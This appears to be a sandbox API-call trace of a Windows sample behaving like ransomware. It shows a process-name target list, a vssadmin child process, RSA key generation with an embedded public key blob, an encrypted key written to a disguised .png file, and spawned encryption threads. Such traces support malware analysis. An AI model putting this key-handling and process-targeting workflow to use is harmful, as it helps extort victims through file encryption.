lstrcmpiW (lpString1="winlogon.exe", lpString2="ServiceHub.Host.Node.x86.exe") returned 1 [0076.152] lstrlenW (lpString="ServiceHub.Host.Node.x86.exe") returned 28 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="Node.exe") returned 1 [0076.152] lstrlenW (lpString="Node.exe") returned 8 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="Microsoft.VisualStudio.Web.Host.exe") returned 1 [0076.152] lstrlenW (lpString="Microsoft.VisualStudio.Web.Host.exe") returned 35 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="Lightshot.exe") returned 1 [0076.152] lstrlenW (lpString="Lightshot.exe") returned 13 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="netbeans64.exe") returned 1 [0076.152] lstrlenW (lpString="netbeans64.exe") returned 14 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="spnsrvnt.exe") returned 1 [0076.152] lstrlenW (lpString="spnsrvnt.exe") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="sntlsrtsrvr.exe") returned 1 [0076.152] lstrlenW (lpString="sntlsrtsrvr.exe") returned 15 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="w3wp.exe") returned 1 [0076.152] lstrlenW (lpString="w3wp.exe") returned 8 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="TeamViewer_Service.exe") returned 1 [0076.152] lstrlenW (lpString="TeamViewer_Service.exe") returned 22 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="TeamViewer.exe") returned 1 [0076.152] lstrlenW (lpString="TeamViewer.exe") returned 14 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="SecomSDK.exe") returned 1 [0076.152] lstrlenW (lpString="SecomSDK.exe") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="schedul2.exe") returned 1 [0076.152] lstrlenW (lpString="schedul2.exe") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="schedhlp.exe") returned 1 [0076.152] lstrlenW (lpString="schedhlp.exe") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="adm_tray.exe") returned 1 [0076.152] lstrlenW (lpString="adm_tray.exe") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="EXCEL.EXE") returned 1 [0076.152] lstrlenW (lpString="EXCEL.EXE") returned 9 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="MSACCESS.EXE") returned 1 [0076.152] lstrlenW (lpString="MSACCESS.EXE") returned 12 [0076.152] lstrcmpiW (lpString1="winlogon.exe", lpString2="OUTLOOK.EXE") returned 1 [0076.152] lstrlenW (lpString="OUTLOOK.EXE") returned 11 [0076.153] lstrcmpiW (lpString1="winlogon.exe", lpString2="POWERPNT.EXE") returned 1 [0076.153] lstrlenW (lpString="POWERPNT.EXE") returned 12 [0076.153] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0076.153] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0076.154] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0076.154] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.155] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.155] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.156] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.156] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.157] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0076.157] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.158] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.158] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0076.159] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0076.159] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0076.160] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0076.160] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.161] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0076.161] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0076.161] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="substantial.exe")) returned 1 [0076.162] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tonyvalveshealthcare.exe")) returned 1 [0076.162] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aceref.exe")) returned 1 [0076.163] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sage_dts.exe")) returned 1 [0076.163] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="congressional_prohibited_lone.exe")) returned 1 [0076.164] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reminder-marriott-divisions.exe")) returned 1 [0076.164] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retired-essentially-blonde.exe")) returned 1 [0076.165] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="growth.exe")) returned 1 [0076.165] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entertaining_boxing_tower.exe")) returned 1 [0076.166] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="practitioner.exe")) returned 1 [0076.166] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="controllercoupon.exe")) returned 1 [0076.167] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pm-dodge.exe")) returned 1 [0076.167] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="exclusively-leading.exe")) returned 1 [0076.168] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strand.exe")) returned 1 [0076.168] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lodging.exe")) returned 1 [0076.169] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ricky.exe")) returned 1 [0076.169] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="latvia_detected_sage.exe")) returned 1 [0076.170] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="handhelds-gnu-z.exe")) returned 1 [0076.170] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tbprinting.exe")) returned 1 [0076.171] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="drawing households.exe")) returned 1 [0076.171] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fibreinvitations.exe")) returned 1 [0076.172] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baptist shipping indicate.exe")) returned 1 [0076.327] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleges-jefferson.exe")) returned 1 [0076.328] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0076.329] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SpyHunter5.exe")) returned 1 [0076.329] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa44, pcPriClassBase=8, dwFlags=0x0, szExeFile="SpyHunter5.exe")) returned 1 [0076.330] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0076.331] Process32NextW (in: hSnapshot=0x84, lppe=0x18f354 | out: lppe=0x18f354*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0076.331] CloseHandle (hObject=0x84) returned 1 [0076.332] CryptAcquireContextA (in: phProv=0x18fa4c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18fa4c*=0x2d5df8) returned 1 [0077.395] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x18fa64, nSize=0x104 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2e [0077.395] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\_uninstalling_.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" [0077.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.396] CryptGenKey (in: hProv=0x2d5df8, Algid=0xa400, dwFlags=0x1800001, phKey=0x18fa48 | out: phKey=0x18fa48*=0x2d4db8) returned 1 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d70e0 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1c0) returned 0x2d7130 [0077.991] CryptExportKey (in: hKey=0x2d4db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x2d7130, pdwDataLen=0x18fa4c | out: pbData=0x2d7130*, pdwDataLen=0x18fa4c*=0x44) returned 1 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x2d72f8 [0077.991] CryptExportKey (in: hKey=0x2d4db8, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x2d7130, pdwDataLen=0x18fa4c | out: pbData=0x2d7130*, pdwDataLen=0x18fa4c*=0xec) returned 1 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12c) returned 0x2d7388 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d7130 | out: hHeap=0x2c0000) returned 1 [0077.991] CryptDestroyKey (hKey=0x2d4db8) returned 1 [0077.991] CryptImportKey (in: hProv=0x2d5df8, pbData=0x2d72f8, dwDataLen=0x44, hPubKey=0x0, dwFlags=0x0, phKey=0x40503c | out: phKey=0x40503c*=0x2d4db8) returned 1 [0077.991] lstrlenA (lpString="BgIAAACkAABSU0ExABAAAAEAAQAfUDvrYL7lF1XhXKge33OTLQA33gYy0ZDOhsWwBJW0B8cSFWvgrgQmosvTFpr4r8AM3zW8414cOdDLL91XnEUOXADx/fwMxGj0Lp+gxl/qg3kKzBSAoqSA+nqyvZtgpjCyQIDIu1FSUWPSkWz8QusTTWl7k5hbf49hgnZUYRDlM+H/YQ89U4gA9oCrqzfpk7dnRjcVGvQbqZeqCLF8PkT5sTXX8uNdXAjXAMqTVcypFHuJP1SFTmjku7nYX0WS6gseq1IynsjDVLY+XEu9JJ8qt5WvYR/Vsm0Q54TuzUcqiLOZdqvR/jntTD9OAbtIk88fjh5Am0wLNXWlMqsN0TbzPSPkDZCR00iCi3uIXblUFRaTuLsj3aAlJmixgXqqYGidWTNUoXGPSDXeM9CdwKL4tF6+B3oT0zYe4xMxuW+LubuQCWh7I2I4KlqaPDBKBtYLhStq2yvW653jn2fx84pCRM+VPuqbIdyo0lOz3W4C35xRKNbQW7XPDDL9b/yU+LhIX4BCZE19Y8u6rf8bJlqwUsIJNjSEHg0KsIQg4W1qrt7uhJCtMX1+dqDCaimWuYM/hguQ7J51LDeeOei/RhvYLe4L2cn9hQ1FQTc1VcReoRBhdU1hRKQQZEesndxPdOsYje1UhuP+qy/RyP958PdtPs7u5ttzWNckR4pgN3uTnQ==") returned 712 [0077.991] GetProcessHeap () returned 0x2c0000 [0077.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x309) returned 0x2d74c0 [0077.992] CryptImportKey (in: hProv=0x2d5df8, pbData=0x2d74c0, dwDataLen=0x214, hPubKey=0x0, dwFlags=0x0, phKey=0x18fa4c | out: phKey=0x18fa4c*=0x2d7130) returned 1 [0077.992] GetProcessHeap () returned 0x2c0000 [0077.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d74c0 | out: hHeap=0x2c0000) returned 1 [0077.992] GetProcessHeap () returned 0x2c0000 [0077.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x240) returned 0x2d74c0 [0077.992] CryptEncrypt (in: hKey=0x2d7130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2d74c0*, pdwDataLen=0x18ff80*=0xec, dwBufLen=0x200 | out: pbData=0x2d74c0*, pdwDataLen=0x18ff80*=0x200) returned 1 [0077.993] GetProcessHeap () returned 0x2c0000 [0077.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2ed) returned 0x2d7a90 [0077.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_uninstalling_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_uninstalling_.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x6, hTemplateFile=0x0) returned 0x80 [0077.994] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0077.994] WriteFile (in: hFile=0x80, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x18ff78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x18ff78*=0x2ad, lpOverlapped=0x0) returned 1 [0077.995] WriteFile (in: hFile=0x80, lpBuffer=0x2d72f8*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x18ff78, lpOverlapped=0x0 | out: lpBuffer=0x2d72f8*, lpNumberOfBytesWritten=0x18ff78*=0x44, lpOverlapped=0x0) returned 1 [0077.995] CloseHandle (hObject=0x80) returned 1 [0077.996] GetProcessHeap () returned 0x2c0000 [0077.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d74c0 | out: hHeap=0x2c0000) returned 1 [0077.996] CryptDestroyKey (hKey=0x2d7130) returned 1 [0077.996] GetProcessHeap () returned 0x2c0000 [0077.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d72f8 | out: hHeap=0x2c0000) returned 1 [0077.996] GetProcessHeap () returned 0x2c0000 [0077.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d7388 | out: hHeap=0x2c0000) returned 1 [0077.996] GetProcessHeap () returned 0x2c0000 [0077.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d70e0 | out: hHeap=0x2c0000) returned 1 [0077.996] GetSystemInfo (in: lpSystemInfo=0x18f9ac | out: lpSystemInfo=0x18f9ac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0077.996] GetProcessHeap () returned 0x2c0000 [0077.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x50) returned 0x2d70e0 [0077.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x403fad, lpParameter=0x405014, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x80 [0077.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x403fad, lpParameter=0x405014, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x88 [0077.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x403fad, lpParameter=0x405014, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x94 [0077.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x403fad, lpParameter=0x405014, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98 [0077.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4036bf, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x9c [0077.999] GetLogicalDrives () returned 0x4 [0077.999] GetProcessHeap () returned 0x2c0000 